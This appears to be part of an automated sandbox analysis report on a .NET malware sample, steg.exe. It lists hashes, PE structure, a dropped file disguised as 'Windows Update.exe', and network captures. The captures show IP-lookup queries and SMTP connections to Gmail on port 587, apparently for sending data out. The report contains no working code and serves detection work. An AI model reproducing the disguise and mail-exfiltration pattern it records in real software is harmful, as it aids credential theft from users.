                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:5876

                                                                                                                  C:\Users\user\AppData\Roaming\pidloc.txt

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49
                                                                                                                  Entropy (8bit):4.359935487883289
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:oNt+kiEaKC59KYr4a:oNwknaZ534a
                                                                                                                  MD5:EAB5D702695BC09B3A1E675917747986
                                                                                                                  SHA1:CCB1F880801A3826B484428802F66BDCCEDFF0B6
                                                                                                                  SHA-256:9E90C44A450FAD02151EC509448B88382B55A7CDC65D32EA970B9AE13C909709
                                                                                                                  SHA-512:7328E450F4E3AE277F5F30BAFC0D7D73835AEC39544A999A2A6D08DC6A20BF83874D7D3C5D8B24764F0C432D9A4F0A697377E27E89A5A4FC260E9041D7CF2EA6
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:C:\Users\user\AppData\Roaming\Windows Update.exe

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):6.562432865407771
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.65%
                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                  • InstallShield setup (43055/19) 0.21%
                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                  File name:steg.exe
                                                                                                                  File size:1167872
                                                                                                                  MD5:30747bb37997b54d37bae65ae590b7e8
                                                                                                                  SHA1:d702ffaac8bf35f3372ef2c310b21eef8a91f6ea
                                                                                                                  SHA256:a39f2e3d1a27bd091c689a09499b374e5f6743de23b42bfd9c7a17c1d49dfad7
                                                                                                                  SHA512:cbc7864f127574f1bcb20a442b83d394320bf325f73e75bc6fa8a2edbbc568ef79973820a672f2340ba5379b9e6ea12c3bb518346b4d702280e9f595d2722322
                                                                                                                  SSDEEP:24576:IoLTkXBwWja4SlukeeKL0xJaqT//aqT8E94Tf3C:Nx6
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&U.....................4........... ........@.. ....................... ............@................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:41455554545445a2

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x51bb1e
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                  Time Stamp:0x55260706 [Thu Apr 9 04:58:46 2015 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:v2.0.50727
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x11bacc0x4f.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x11c0000x3200.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1200000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000x119b240x119c00False0.521700137256data6.57631984878IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x11c0000x32000x3200False0.105546875data3.584800479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x1200000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_ICON0x11c4e00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2004318071, next used block 4286019447
                                                                                                                  RT_ICON0x11c7c80x128GLS_BINARY_LSB_FIRST
                                                                                                                  RT_ICON0x11c8f00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                                                  RT_ICON0x11d1980x568GLS_BINARY_LSB_FIRST
                                                                                                                  RT_ICON0x11d7000x353PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                  RT_ICON0x11da580x10a8data
                                                                                                                  RT_ICON0x11eb000x468GLS_BINARY_LSB_FIRST
                                                                                                                  RT_GROUP_ICON0x11ef680x68data
                                                                                                                  RT_VERSION0x11c2500x290MS Windows COFF PA-RISC object file
                                                                                                                  RT_MANIFEST0x11efd00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                  Version Infos

                                                                                                                  DescriptionData
                                                                                                                  Translation0x0000 0x04b0
                                                                                                                  LegalCopyrightCopyright 2014
                                                                                                                  Assembly Version1.0.0.0
                                                                                                                  InternalNameStub.exe
                                                                                                                  FileVersion1.0.0.0
                                                                                                                  ProductNameStub
                                                                                                                  ProductVersion1.0.0.0
                                                                                                                  FileDescriptionStub
                                                                                                                  OriginalFilenameStub.exe

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 22, 2022 03:35:49.548432112 CET4976980192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.564968109 CET8049769104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.565078020 CET4976980192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.565628052 CET4976980192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.581891060 CET8049769104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.603715897 CET8049769104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.648091078 CET4976980192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.651738882 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.651789904 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.651904106 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.919837952 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.919884920 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.970504045 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.970649958 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.973957062 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:49.973985910 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.974384069 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.138685942 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.471261024 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.502497911 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502588987 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502660990 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502712011 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.502718925 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502758026 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502784014 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.502826929 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502887964 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.502948046 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.502959967 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.503032923 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.503056049 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.503070116 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.503156900 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.503276110 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.503299952 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.503324986 CET44349770104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:50.503488064 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.503504992 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:50.510982990 CET49770443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:51.510516882 CET4976980192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:51.527602911 CET8049769104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:51.527678967 CET4976980192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:35:51.615544081 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:51.642159939 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:51.642265081 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.781536102 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.781826973 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.808290005 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.813298941 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.813864946 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.840512037 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.841029882 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.867722034 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.867769957 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.867809057 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.867837906 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.867841959 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.867891073 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.874455929 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.901079893 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.913222075 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.939934015 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.941560984 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:52.968317986 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:52.969223022 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:53.000490904 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:53.186350107 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:53.187505007 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:53.213756084 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:53.214073896 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:53.420264959 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:53.446252108 CET58749771108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:53.448362112 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:35:57.867176056 CET49771587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:14.397748947 CET4977880192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:14.414284945 CET8049778104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:14.414541006 CET4977880192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:14.415174961 CET4977880192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:14.432487011 CET8049778104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:14.441380978 CET8049778104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:14.476999998 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:14.477051020 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:14.477332115 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:14.641254902 CET4977880192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:15.152592897 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:15.152631998 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:15.192732096 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:15.192898035 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:15.232606888 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:15.232662916 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:15.233402014 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:15.438199997 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:15.441008091 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.405088902 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.430988073 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431046009 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431090117 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431113958 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.431128025 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431139946 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431184053 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431185961 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.431220055 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431252956 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.431263924 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431277037 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431318998 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.431338072 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431372881 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431395054 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.431416035 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431468964 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.431483030 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431500912 CET44349779104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:16.431551933 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:16.435791969 CET49779443192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:18.709213972 CET4977880192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:18.725524902 CET8049778104.16.155.36192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.725651026 CET4977880192.168.2.4104.16.155.36
                                                                                                                  Mar 22, 2022 03:36:18.804891109 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.831351995 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.831476927 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.859519005 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.859970093 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.886312008 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.890105009 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.890435934 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.917603970 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.918216944 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.945125103 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.945179939 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.945219994 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.945250988 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.945266008 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.945410013 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.948466063 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:18.975002050 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.985488892 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:19.012296915 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:19.063807011 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:19.090595007 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:19.091109991 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:19.121975899 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:19.339478970 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:19.340279102 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:19.366837978 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:19.367007017 CET58749780108.177.127.109192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:19.453663111 CET49780587192.168.2.4108.177.127.109
                                                                                                                  Mar 22, 2022 03:36:22.770102978 CET49780587192.168.2.4108.177.127.109

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 22, 2022 03:35:49.153886080 CET5774753192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:35:49.172836065 CET53577478.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.480837107 CET5817153192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:35:49.502553940 CET53581718.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:49.614589930 CET5759453192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:35:49.636188030 CET53575948.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:35:51.556113005 CET6051253192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:35:51.583343983 CET53605128.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:12.834089994 CET5247253192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:36:13.878803968 CET5247253192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:36:13.895982027 CET53524728.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:14.321674109 CET6235453192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:36:14.345383883 CET53623548.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:14.452385902 CET5006153192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:36:14.475357056 CET53500618.8.8.8192.168.2.4
                                                                                                                  Mar 22, 2022 03:36:18.751650095 CET6061253192.168.2.48.8.8.8
                                                                                                                  Mar 22, 2022 03:36:18.791414976 CET53606128.8.8.8192.168.2.4

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Mar 22, 2022 03:35:49.153886080 CET192.168.2.48.8.8.80x88e5Standard query (0)140.244.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:49.480837107 CET192.168.2.48.8.8.80x74aaStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:49.614589930 CET192.168.2.48.8.8.80xa390Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:51.556113005 CET192.168.2.48.8.8.80x6013Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:12.834089994 CET192.168.2.48.8.8.80xfeaaStandard query (0)140.244.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:13.878803968 CET192.168.2.48.8.8.80xfeaaStandard query (0)140.244.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:14.321674109 CET192.168.2.48.8.8.80xadccStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:14.452385902 CET192.168.2.48.8.8.80x107aStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:18.751650095 CET192.168.2.48.8.8.80xbc04Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Mar 22, 2022 03:35:49.172836065 CET8.8.8.8192.168.2.40x88e5Name error (3)140.244.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:49.502553940 CET8.8.8.8192.168.2.40x74aaNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:49.502553940 CET8.8.8.8192.168.2.40x74aaNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:49.636188030 CET8.8.8.8192.168.2.40xa390No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:35:49.636188030 CET8.8.8.8192.168.2.40xa390No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
